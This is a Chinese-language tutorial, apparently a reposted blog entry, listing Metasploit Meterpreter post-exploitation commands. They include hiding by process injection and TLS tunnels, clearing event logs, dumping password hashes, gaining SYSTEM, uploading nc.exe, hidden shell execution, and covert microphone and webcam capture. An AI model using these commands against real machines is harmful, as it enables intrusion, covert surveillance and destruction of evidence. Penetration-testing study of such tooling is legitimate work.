metasploit framework(五):meterpreter基本命令和python扩展

基于内存的DLL注入式payload

  注入合法的系统进程并建立stager

  基于stager上传和预加载DLL进行扩展模块的注入(客户端API)

  基于stager建立的socket连接建立加密的TLS/1.0通信隧道(避免网络取证)

  利用TLS隧道进一步加载后续扩展模块

meterpreter服务器使用C语言编写,客户端基于ruby的全特性API(支持任何语言)

 

进入到meterpreter的shell

help命令查看命令帮助手册

background后退到msf的命令提示符界面

pwd当前目录,cd,ls,mkdir,rmdir删除目录,mv,cat,rm,edit相当于vi,

lcd,lpwd 本地linux的目录操作

run运行模块

bgrun后台运行模块,有两百多个模块可以使用

比如杀掉杀毒程序的模块

 获取用户密码hash

远程桌面

clearev 清除事件日志

清理前可以看到这么多日志

运行clearev之后

 时间日志就被清除了

 

download 下载文件

将目标主机上的文件下载到本地

upload 上传文件

将本机文件上传到目标机器上

上传一个nc.exe到目标主机

执行execute

execute -f cmd.exe -i -H

后台执行cmd.exe

getuid查看当前账号

getsystem获取system权限

getprivs,查看权限

getproxy,获取代理

getpid 查看payload注入的是哪个进程

ps查看目标主机上运行的进程,可以看到对应的进程是svchost.exe

我们可以将注入迁移到其他的进程 migrate

比如迁移到explorer.exe上,注入更持久

就迁移到1512进程上了

sysinfo查看目标主机信息

kill 杀死进程

reboot重启目标机器

shell获取shell

show_mount 查看硬盘信息

搜索文件

arp 查看arp缓存

netstat查看网络连接情况

ifconfig、ipconfig 查看当前IP

route 查看路由表

route -add 添加路由表 -delete删除路由表

idletime 查看目标机器空闲时间

resource 添加脚本执行文件,一键执行多条指令

比如先建立一个脚本文件

里面打个比方放上两条指令

然后调用这个脚本文件 resource -r r.txt,就逐步执行刚才的两条指令

record_mic 记录麦克风

webcam_list 列出目标机器上连接的摄像头

webcam_snap -i 1 -v false 每隔一秒拍摄一张图片

meterpreter python 扩展

客户端无需运行环境,就可以运行原生python代码,无需编译

这个扩展是以插件的形式,需要加载到meterprete

 help查看就会看到多出来几个python的命令

python execute 直接执行命令

python_import 加载python文件

比如有一个find.py

执行

然后就可以自己写python工具!

原文地址:https://www.cnblogs.com/zylq-blog/p/6774782.html